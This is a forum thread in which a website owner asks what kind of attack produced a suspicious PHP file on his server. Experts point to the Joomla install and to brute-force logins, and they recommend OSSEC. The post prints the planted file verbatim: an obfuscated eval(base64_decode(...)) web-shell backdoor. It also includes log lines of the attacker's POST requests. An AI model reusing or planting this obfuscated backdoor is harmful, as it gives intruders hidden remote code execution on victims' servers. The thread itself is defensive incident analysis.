What kind of a hack is this?

Posted on 2014-12-23
Last Modified: 2014-12-23
I had a bunch of PHP files messed up yesterday by some script.  The common thing is they had 666 permissions rather than 644.  But ... still ... a script had access to mess the files up.

This morning I find these lines in one of the logs: - - [23/Dec/2014:00:05:06 -0500] "POST /images/gwwgv.php HTTP/1.1" 200 33 "-" "Opera/9.80 (Windows NT 6.1; Opera Tablet/15165; U; en) Presto/2.8.149 Version/11.1" - - [23/Dec/2014:04:03:17 -0500] "POST /images/gwwgv.php HTTP/1.1" 200 33 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; ja-JP) AppleWebKit/533.20.25 (KHTML, like Gecko) Version/5.0.4 Safari/533.20.27"

And the PHP file in question is this:

<?php /*m\i2s-*/eval/*Ad?K8s*/(/*jHF&*/base64_decode/*(~G+z*/(/*=32*/'Lyp6OTNaYn0qL2V2YWwvKjNZezMqLygvKjcuSz1pWyovYmFzZTY0X2RlY29kZS8qRHFHeyovKC8qLno2K'/*ueL<*/./*6 qH*/'WVFWiovJ0x5cE1VM3RUSmlvdmFXWXZLa0EyZlc5UWZpb3ZLQzhxWicvKlE/c3IwaiovLi8qOnxASCovJ1'/*HnRA*/./*Cdlj=.*/'ZGK0tpOXBjM05sZEM4cU0yWWhZaTVZWkNvdktDOHFYMScvKl9pfTVSR3oqLy4vKmpxdH02Ki8nMUtLaTh'/*!.R5*/./*ehZS%*/'rWDFKRlVWVkZVMVF2S2w4bUxEOUpVeW92V3k4Jy8qIW9KdUQqLy4vKm97NEcqLydxSVRFd1VWOHdXU292'/*PKlM}%*/./*n{*/'SjNrbkx5b3RleWhxY3k1QUtpOHUnLypLVy58Wi0qLy4vKkk5WnFdW0gqLydMeW9zS0d3cEtpOG5aeWN2S'/*<o!}3*/./*}en~p*/'240OFZtc3FMeTR2S24xdFAnLyorWDB7ciovLi8qVVJMdSovJ2xoTE15b3ZKM2tuTHlwN1MxeDdkeW92TG'/*E;4=]*/./*(9S*/'k4cUlHMXBVbCcvKmR4a25EayovLi8qN3VCKi8nb3FMeWQ0Snk4cVRqazVLaTh1THlwcWJERitVellxTHl'/*{HYT2t*/./*;0UAF9*/'kJy8qVF9ePDMqLy4vKkF3RGIqLydrSnk4cVRIQmhOU292WFM4cU9YazFTRlVxTHk4cWFqNWwnLyowMjd0'/*_R|W*/./*f-KQq_*/'Ki8uLypJY099IFRyKi8nVlY0cUx5a3ZLbTQwTFc0cUx5OHFOVlZOYm1SYUtpOHBMJy8qR25IeCovLi8qO'/*hc]4b*/./*K^oB5y*/'nlvbEAqLyd5cFZlazl2YlhFcUwyVjJZV3d2S2poK0prMGhTeW92S0MnLyogaChbc3pUNSovLi8qeWllcW'/*X(4J:@*/./*5,>*/'tyUCovJzhxUURaZVF5b3ZjM1J5YVhCemJHRnphR1Z6THlweElGQScvKjNmVWhUKi8uLypeMngzKi8nc0x'/*s:@*/./*gf=*/'pb3ZLQzhxT0U1ek1WZ3lZQ292SkY5U1JWRlZSVk5VJy8qLEJxPTVwaSovLi8qTilTMCUqLydMeW9oVVZo'/*b>x]*/./*>|TG*/'b1Fsd3FMMXN2S2lWN1p6Z3pLaThuZVNjdksnLypgRzhOZlcqLy4vKiVZNSovJ2tjaFhqQXFMeTR2S2xGd'/*t|qE5*/./*(}XycS*/'FlrOHNLaThuWnljdktrZzZiUycvKkt4WkElSEgqLy4vKjB+VS0qLydvdkxpOHFRSEZZYkRVcUx5ZDVlR1'/*[:I*/./*:bP*/'FuTHlvaGZTaFNLaTknLyp9KF9yUiovLi8qTW5VZGsuXSovJ2RMeXBYT25wRFlGa3FMeThxTWljc1czNXZ'/*wEy93*/./*?0{^*/'LaThwTHlvZycvKlVSXWJ0Ki8uLypJaS4qLydYVUk0VWlvdkx5bzVLWGw0Y0NvdktTOHFVbXRpVnp0OUsn'/*u}C*/./*5_D0*/'LypJUWZ4Ki8uLyp7LHsxeTgqLydpOHZLa1ZmYlc4NVFrQlVLaTg3THlwWWFubGVjU2h3YVNvdicvKkEnJ'/*!ja*/./*~J_n*/'05SXHhqKi8pLyopK215PSovLypzMC1nWztJKi8pLypZXHQ1ZlEqLy8qcEVRZ0xbXyovOy8qfEo0LT8qLw=='/*uRn34*/)/*kzY!*//*JJD*/)/*:@uW*//*BN9T*/;/*ZTX%*/ ?>

Open in new window

What kind of attack is this? I want to correct more completely than just locking down the permissions so that the script doesn't work.

Of course, I'll delete the PHP file, but ... there's a vulnerability involved that allowed the file to be placed there.  I want to close that down.

Question by:Daniel Wilson
  • 2
  • 2
LVL 58

Expert Comment

ID: 40514876
What are you running?
Wordpress or similar?
The contact form is the usual way to hack if it was done through the website or one of the plugins/vulnerabilities of WP et al
Otherwise you need to check the server logs for SSH/FTP brute force attacks
LVL 32

Author Comment

by:Daniel Wilson
ID: 40514886
There is one Joomla site ... though most are hand-coded PHP.

Thanks for the tip ... I'll look harder at some of those other logs.
LVL 58

Accepted Solution

Gary earned 500 total points
ID: 40514888
Joomla would be the one I would be looking at with stern eyes.
LVL 32

Author Comment

by:Daniel Wilson
ID: 40514900
Looks like it's been quite a target.  I have hundreds of lines like this from one IP in the same day. - - [03/Nov/2014:23:20:35 -0500] "POST /administrator/index.php HTTP/1.1" 200 4335 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)" - - [03/Nov/2014:23:20:35 -0500] "GET /administrator/index.php HTTP/1.1" 200 4113 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)" - - [03/Nov/2014:23:20:36 -0500] "POST /administrator/index.php HTTP/1.1" 200 4335 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)" - - [03/Nov/2014:23:20:36 -0500] "GET /administrator/index.php HTTP/1.1" 200 4113 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)"

Open in new window

LVL 34

Expert Comment

ID: 40514976
If you have root access (e.g. dedicated server, VPS, etc), then try using OSSEC to help secure your site against random attacks like this.

Here's a good tutorial on how to set it up:

The tutorial is geared towards Wordpress but OSSEC is a general-purpose security application:

Featured Post

Efficient way to get backups off site to Azure

This user guide provides instructions on how to deploy and configure both a StoneFly Scale Out NAS Enterprise Cloud Drive virtual machine and Veeam Cloud Connect in the Microsoft Azure Cloud.

Question has a verified solution.

If you are experiencing a similar issue, please ask a related question

Suggested Solutions

This story has been written with permission from the scammed victim, a valued client of mine – identity protected by request.
This article discusses how to create an extensible mechanism for linked drop downs.
Explain concepts important to validation of email addresses with regular expressions. Applies to most languages/tools that uses regular expressions. Consider email address RFCs: Look at HTML5 form input element (with type=email) regex pattern: T…
The viewer will learn how to create and use a small PHP class to apply a watermark to an image. This video shows the viewer the setup for the PHP watermark as well as important coding language. Continue to Part 2 to learn the core code used in creat…

773 members asked questions and received personalized solutions in the past 7 days.

Join the community of 500,000 technology professionals and ask your questions.

Join & Ask a Question